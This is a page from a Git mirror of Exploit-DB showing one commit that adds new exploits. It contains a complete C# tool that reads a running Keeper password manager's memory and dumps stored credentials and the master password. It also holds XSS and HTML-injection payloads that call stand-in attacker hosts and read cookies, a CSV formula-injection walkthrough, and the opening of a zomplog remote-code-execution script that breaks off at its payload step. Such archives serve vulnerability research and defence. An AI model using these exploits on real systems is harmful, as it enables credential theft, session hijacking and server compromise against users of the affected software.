bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-07-29

Browse source 
22 changes to exploits/shellcodes/ghdb

Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping

Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)

Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

Joomla HikaShop 4.7.4 - Reflected XSS

Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS

mooDating 1.2 - Reflected Cross-site scripting (XSS)

October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)

PaulPrinting CMS - (Search Delivery) Cross Site Scripting

Perch v3.2 - Persistent Cross Site Scripting (XSS)

RosarioSIS 10.8.4 - CSV Injection

WordPress Plugin AN_Gradebook 5.0.1 - SQLi

Zomplog 3.9 - Cross-site scripting (XSS)

zomplog 3.9 - Remote Code Execution (RCE)
copyparty 1.8.2 - Directory Traversal
copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution

mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory

Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
This commit is contained in:
Exploit-DB 2023-07-29 00:16:43 +00:00
parent 033e7ba3e0
commit c18d9953a2
22 changed files with 1702 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

209
exploits/multiple/local/51623.cs Normal file
View file

@ -0,0 +1,209 @@
# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266
using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;
// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
// As a result of this one can extract credentials & master password from a victim after achieving low priv access
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper
static class Program
{
// To make sure we are targetting the right child process - check command line
public static string GetCommandLine(this Process process)
{
if (process is null || process.Id < 1)
{
return "";
}
string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
using (var searcher = new ManagementObjectSearcher(query))
using (var collection = searcher.Get())
{
var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
return managementObject != null ? (string)managementObject["CommandLine"] : "";
}
}
//Extract plain text credential JSON strings (regex inelegant but fast)
public static void extract_credentials(string text)
{
int index = text.IndexOf("{\"title\":\"");
int eindex = text.IndexOf("}");
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
int match_cut = match.IndexOf("} ");
if (match_cut != -1 )
{
match = match.Substring(0, match_cut + "} ".Length).TrimEnd();
if (!stringsList.Contains(match) && match.Length > 20)
{
Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");
stringsList.Add(match);
}
} else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
{
Console.WriteLine("->Credential Record Found : " + match + "\n");
stringsList.Add(match.TrimEnd());
}
index = text.IndexOf("{\"title\":\"", index + 1);
eindex = text.IndexOf("}", eindex + 1);
}
catch
{
return;
}
}
}
// extract account/email containing JSON string
public static void extract_account(string text)
{
int index = text.IndexOf("{\"expiry\"");
int eindex = text.IndexOf("}");
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
if ((match.Length > 2))
{
Console.WriteLine("->Account Record Found : " + match + "\n");
return;
}
index = text.IndexOf("{\"expiry\"", index + 1);
eindex = text.IndexOf("}", eindex + 1);
}
catch
{
return;
}
}
}
// Master password not available with SSO based logins but worth looking for.
// Disregard other data key entries that seem to match: _not_master_key_example
public static void extract_master(string text)
{
int index = text.IndexOf("data_key");
int eindex = index + 64;
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(data_key[ -~]+)");
var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
if (match_one.Replace("data_key", "").Length > 5)
{
if (!clean.IsMatch(match_one.Replace("data_key", "")))
{
Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
}
}
index = text.IndexOf("data_key", index + 1);
eindex = index + 64;
}
catch
{
return;
}
}
}
// Store extracted strings and comapre
public static List<string> stringsList = new List<string>();
// Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
// Performs OpenProcess to get handle with necessary query permissions
static void Main(string[] args)
{
foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
{
string commandline = GetCommandLine(process);
if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
{
Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
Console.WriteLine("->Searching...\n");
IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
IntPtr address = new IntPtr(0x10000000000);
MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
{
if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
{
byte[] buffer = new byte[(int)memInfo.RegionSize];
if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
{
string text = Encoding.ASCII.GetString(buffer);
extract_credentials(text);
extract_master(text);
extract_account(text);
}
}
address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
}
CloseHandle(processHandle);
}
}
}
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("ntdll.dll")]
public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
[StructLayout(LayoutKind.Sequential)]
public struct MEMORY_BASIC_INFORMATION
{
public IntPtr BaseAddress;
public IntPtr AllocationBase;
public uint AllocationProtect;
public IntPtr RegionSize;
public uint State;
public uint Protect;
public uint Type;
}
}

174
exploits/php/webapps/51613.txt Normal file
View file

@ -0,0 +1,174 @@
# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities
References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278
Release Date:
2023-07-04
Vulnerability Laboratory ID (VL-ID): 2278
Common Vulnerability Scoring System: 5.4
Product & Service Introduction:
===============================
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.
Affected Product(s):
====================
ActiveITzone
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-20: Researcher Notification & Coordination (Security Researcher)
2021-08-21: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.
The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Manage Details
Vulnerable Parameter(s):
[+] name
[+] phone
[+] address
Affected Module(s):
[+] manage profile
[+] products branding
Proof of Concept (PoC):
=======================
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">
Vulnerable Source: manage_admin & branding
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">
<div class="panel-heading">
<h3 class="panel-title">Manage Details</h3>
</div>
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8">
<div class="panel-body">
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>
<div class="col-sm-6">
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">
</div></div>
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>
<div class="col-sm-6">
<input type="email" name="email" value="accountant@shop.com" id="demo-hor-2" class="form-control required">
</div></div>
<div class="form-group">
<label class="col-sm-3 control-label" for="demo-hor-3">
Phone</label>
<div class="col-sm-6">
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">
</div></div>
--- PoC Session Logs (POST) ---
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680
Content-Length: 902
Origin:https://assm_cms.localhost:8080
Connection: keep-alive
Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/
Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly
https://assm_cms.localhost:8080/shop/admin/manage_admin/
Host: assm_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Reference(s):
https://assm_cms.localhost:8080/shop/
https://assm_cms.localhost:8080/shop/admin/
https://assm_cms.localhost:8080/shop/admin/manage_admin/
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/
Solution - Fix & Patch:
=======================
Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver.
Security Risk:
==============
The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

144
exploits/php/webapps/51614.txt Normal file
View file

@ -0,0 +1,144 @@
Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286
Release Date:
=============
2023-07-17
Vulnerability Laboratory ID (VL-ID):
====================================
2286
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
(Copy of the Homepage:https://codecanyon.net/user/codepaul )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application.
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application.
Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data.
The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter
affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side
script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] /account/delivery
Vulnerable Input(s):
[+] Search
Vulnerable Parameter(s):
[+] q
Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts
Proof of Concept (PoC):
=======================
The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Example
https://codeawesome.in/printing/account/delivery?q=
PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: (Search - delivery?q=)
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right">
<i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">
<div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>
</div></div>
Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

198
exploits/php/webapps/51615.txt Normal file
View file

@ -0,0 +1,198 @@
#Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2317
Release Date:
=============
2023-07-04
Vulnerability Laboratory ID (VL-ID):
====================================
2317
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.
No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.
(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
Affected Product(s):
====================
Product Owner: dooblou
Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-01-19: Researcher Notification & Coordination (Security Researcher)
2022-01-20: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application
requests from the application-side.
The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated
and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to
perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the
front- & backend of the wifi explorer.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious
source and non-persistent manipulation of affected application modules.
Proof of Concept (PoC):
=======================
The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.
PoC: Exploitation
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>
http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3
http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX
Vulnerable Sources: Execution Points
<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td
style="vertical-align:top;"><table style="background-color: #FFA81E;
background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
background-repeat: repeat-x; background-position:top;" width="700"
cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span
class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl
e style="background-color: #B2B2B2; background-image:
url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0">
<tbody><tr><td><span class="doob_medium_text">Cannot find file or
directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN
INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a
href="/">>>&nbsp;Back To
Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br>
-
<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr>
<td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST">
<input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td>
<table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);
background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:
nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">
&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I
-
<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"
href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"
style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action',
'13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;
<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy",
"/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'
style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td>
<td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style:
none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"
title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:
none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"
title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>
---PoC Session Logs ---
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
-
http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
-
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Security Risk:
==============
The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.

37
exploits/php/webapps/51622.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: RosarioSIS 10.8.4 - CSV Injection
# Google Dork:NA
# Exploit Author: Ranjeet Jaiswal#
# Vendor Homepage: https://www.rosariosis.org/
# Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip
# Affected Version: 10.8.4
# Category: WebApps
# Tested on: Windows 10
#
#
# 1. Vendor Description:
#
# RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems.
#
# 2. Technical Description:
#
# A CSV Injection (also known as Formula Injection) vulnerability in the RosarioSIS web application with version 10.8.4 allows malicious users to execute malicious payload in csv/xls and redirect authorized user to malicious website.
#
# 3. Proof Of Concept:
3.1. Proof of Concept for CSV injection.
# #Step to reproduce.
Step1:Login in to RosarioSIS 10.8.4
Step2:Go to Periods page
Step3:Add CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")"in the Title field
Step4:click on Save button to save data.
Step5:Go to export tab and export the data
Step6:When user open download Periods.xls file.You will see redirection hyperlink.
Step7:When user click on link ,User will be redirected to Attacker or
malicious website.
# 4. Solution:
Upgrade to latest release of RosarioSIS.

58
exploits/php/webapps/51624.py Executable file
View file

@ -0,0 +1,58 @@
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)
#Application: zomplog
#Version: v3.9
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://zomp.nl/zomplog/
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
#Date of found: 22.07.2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
#inputs
username=input('username: ')
password=input('password: ')
#urls
login_url="http://localhost/zimplitcms/zimplit.php?action=login"
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"
poc_url="http://localhost/zimplitcms/poc.php"
#login
session = requests.Session()
login_data=f"lang=en&username={username}&password={password}&submit=Start!"
headers={
'Cookie' : 'ZsessionLang=en',
'Content-Type' : 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'
}
login_req=session.post(login_url,headers=headers,data=login_data)
if login_req.status_code == 200:
print('Login OK')
else:
print('Login promlem.')
exit()
#payload
